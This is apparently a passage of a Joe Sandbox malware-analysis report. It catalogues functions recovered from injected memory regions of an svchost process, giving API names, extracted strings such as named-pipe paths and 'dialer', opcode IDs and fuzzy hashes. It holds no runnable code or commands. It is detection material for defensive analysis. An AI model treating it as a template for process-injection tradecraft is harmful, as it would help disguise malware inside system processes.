                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          • API String ID: 3702945584-1395475152
                                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction ID: 3937cb81b8b0f971906db0413d64368154e2d1c9df82cae5cad0a14440eaf12d
                                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction Fuzzy Hash: C2118E707CCB8041FA6EA7357D5F36D71416B483F2F2443A4B93A066EADE78D4028728
                                                                          Function 00000257E10A7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 190073905-0
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 1fcdb397b1644b17d16c1eb1e9d437d376732d2965c1ff5ed4ddc4445df92217
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 168117317CCF4186FB5FAB65BC4B39926D0BB89782F44C4A5DA0447396FB3AC4458728
                                                                          Function 00000257E10A9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
                                                                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction ID: 1ca0844d76c3e8bd01ab4792baa35eba0e52544e90a3a5dfd8280d08fd67e20c
                                                                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction Fuzzy Hash: CB31F63139AF00E1EE1BDB02BC0BB5523D4B748BA2F5905659E2F4B792DF38C0458328
                                                                          Function 00000257E10B3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction ID: 9ee7c4574fcb2fd013fb964aa6248de50fe65bdbb00ad364504beb63cc9ade48
                                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction Fuzzy Hash: 3111BF31358F4086E756CB12FC4BB1972A4F388FE6F180265EA2A87794CF38C8148748
                                                                          Function 00000257E10A3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                          • String ID: wr
                                                                          • API String ID: 1092925422-2678910430
                                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction ID: 9a2b3325603176c98f4169559021404f9569204c8e58316270e8b4dcf71a70dc
                                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction Fuzzy Hash: 60118B36348F4086EF199B22F80E76A62B4FB88B86F040468DE990B794EF3DC545C718
                                                                          Function 00000257E10A5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Current$Context
                                                                          • String ID:
                                                                          • API String ID: 1666949209-0
                                                                          • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction ID: 966c8cfc9cd363fdfda02b2bdcc18e9b8abbeec9a729aea55c5a0fc7a420839d
                                                                          • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction Fuzzy Hash: E6D1C976248F88C1DA75DB0AF89A35A77A0F388B85F104252EACD47BA9DF3CC551CB14
                                                                          Function 00000257E10A2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: dialer
                                                                          • API String ID: 756756679-3528709123
                                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction ID: cdb653347486f95d6936b3a6e080e65dbc29c48c69199ff8dba1e233120f6aa2
                                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction Fuzzy Hash: CF31D232389F5186EA1ACF16FD4BB69A7A4FB44B86F084170AE4847B55EF34C4A18314
                                                                          Function 00000257E10ACFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction ID: bbc7888f5e4037d8188519172c2121bad00389fe15c94999cae900f3cde1423e
                                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction Fuzzy Hash: A4114D703C8F8081FA6E97317E4F76D21516B487E2F1447A4B936466E6DE78C4018728
                                                                          Function 00000257E10A199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 517849248-0
                                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction ID: 4c54e0cd68b01bb03e9099f5d5445d1d048295c9e60c374dc5866ed19de68462
                                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction Fuzzy Hash: 48015731348F4082EA19DB52B89AB5A63A5F788FC2F888475DE5A43754DE38C989C704
                                                                          Function 00000257E10A36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 449555515-0
                                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction ID: f5791e389f93502f4c9fee8c8b73c305a7e67720a75c226d159784ea1be0102c
                                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction Fuzzy Hash: 47011775259F4086EB2ADB22FC1F71A66B0BB99B87F0404A4DA5907764EF3DC148CB18
                                                                          Function 00000257E10A9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: dfda00a6953bd7fd31afee440e3a8cdc3f116b40ca32194e381a607924f2b4fb
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: 4C51A132749B008AEB1EDB25FC4FB593796F344B89F1081A8DA1747788EB75E981C718
                                                                          Function 00000257E10A8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: 7996f0918551bbe49c81effb0a51052158cdeed2e265b154e812129fb940380b
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: 7A317832388B409AE71ADB21FC4BB5937A5F340B8AF158158AE5747789DB39D980C718
                                                                          Function 00000257E10A1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                          • String ID: \\?\
                                                                          • API String ID: 2719912262-4282027825
                                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction ID: d56e8e4ea1c63715ed7fae816492958a322087c5f1097162d2259ce4f6dc8c21
                                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction Fuzzy Hash: C2F06272348F4192EB65CF21FCDAB5A67A1F758BCAF848060DA4946954DF3CC68DCB04
                                                                          Function 00000257E10ABC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction ID: a1c3fc9fb2c424eb5cf16538e388777059fc8f0e0a0ae8e1d12dd053b8120eaf
                                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction Fuzzy Hash: D9F06271359F0481EB1ACB29FC4FB6A6321FB88BA2F540299DA6A461E4DF3CC4448354
                                                                          Function 00000257E10A3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CombinePath
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3422762182-91387939
                                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction ID: 6788c6199675c10edf7c539ab1b1bd7f0a961ca82cbb9ee56a1611471c4650f0
                                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction Fuzzy Hash: E1F08C2038DF8482EA49CF13BD1F619A260AB48FC2F0880B0EE6A07B18DF3CC4458708
                                                                          Function 00000257E10A50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction ID: 3bab7aea2da97d2c89cf869e435822f7947a441c0eb5686131a233f6f073e29f
                                                                          • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction Fuzzy Hash: 8702F67225DB8086EBA5CB59F89635AB7A0F3C4785F104055EA8E87BA8DF7CC484CF14
                                                                          Function 00000257E10A5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction ID: 7c0b0c8c25f7da43d0dd52c625788ab6d70cb4887c3805681c3f7a601031dd5b
                                                                          • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction Fuzzy Hash: E261C77655DF40C6E76A8B1AF84A31AB7E0F388785F100155EA8E47BA8DB7CC444CF18
                                                                          Function 00000257E10B4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 9bd224d7f8937e48dcb23c6a92691f7b715b7476c5eb2bebaeb9097fbf750117
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 3011A722FDCF5021F66E9568FC5FB6911406B783B6F180EA4A577876D6CA34CB41811C
                                                                          Function 00000257E1083504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283125678.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: a39f79cb811ea4c1becf5d789feaa45f4274d3385c809976c6f2e92f2461cad1
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: B911A7226DCF1119FA5E1529FC4F3693180EBD9376F4846B8A9660EFDACA78C8414228
                                                                          Function 00000257E107F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283125678.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                          • API String ID: 3215553584-4202648911
                                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction ID: 8e9c97b707987eaf443330098e57a4151393cd7d99a53dd1af56ba60a02a01f1
                                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction Fuzzy Hash: 7561D63268CF4042F66FFB69FD4F3B966A1F782742F514495DA2A07795DB34C8428308
                                                                          Function 00000257E10AAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CallEncodePointerTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3544855599-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: 84adbe2866ac1e2fb66f4364389380746c042a873a352a778f6fc0d74beb4a81
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: E961BD33608F88CAEB29DF65E88639D77A0F358B89F044255EF4A17B99DB38C084C714
                                                                          Function 00000257E10AAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: ff1a59e2cae9877e41fdea86006ac35bc3c2ac676c8524eb9a1b3888c61eb4ec
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: 6351E172188B80CAEB7D8F65B88B35D77A4F354B86F148156DB8A47BD5CB38C490C718
                                                                          Function 00000257E107A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283125678.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 83f5e9c311c848ec4fd2a0c7c7ec5783ac5279642614553dd1b91d6c427617f7
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: 0E51D432148B80CAEB7AAF25B84B37877A0F354B86F1C8155FA8947BD5CB78D491C708
                                                                          Function 00000257E1078405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283125678.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: ee813d9cd048edd468e5633751c041e363784de44c713b5dfd16f397443d62c2
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: 5A51D272749B008AEB5EEF15F80BB283795F350B99F5581A6DA064778CEB74DCC08708
                                                                          Function 00000257E10783E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283125678.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: fef70a26cb8617019fb27fbb8b1d28829320fb28e202bfa77e2c679c26842ebd
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: 7A31A271249B40D6E71AEF21FC4B72977A4F340B9AF158059EE5A07B88DB38C980C708
                                                                          Function 00000257E10B2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                          • String ID:
                                                                          • API String ID: 2718003287-0
                                                                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction ID: 68dab6fe74a75fbd6536b3dcbd820ba112786e56dfb684d69ab30bb7c3da5d7e
                                                                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction Fuzzy Hash: 69D13032B58F8089E716CFB9E84A79C3BB1F354B99F008256CE5997B99DB38D406C344
                                                                          Function 00000257E10A14A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free
                                                                          • String ID:
                                                                          • API String ID: 3168794593-0
                                                                          • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction ID: 1db1360ba7b751730b1259011854ce9dc25cb220d1e3979c32bb2201401d3ca7
                                                                          • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction Fuzzy Hash: 16015A32648F90C6E709DF66FD0A64A77A4F788F82F084825EA5A43729DE38C451C744
                                                                          Function 00000257E10B2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
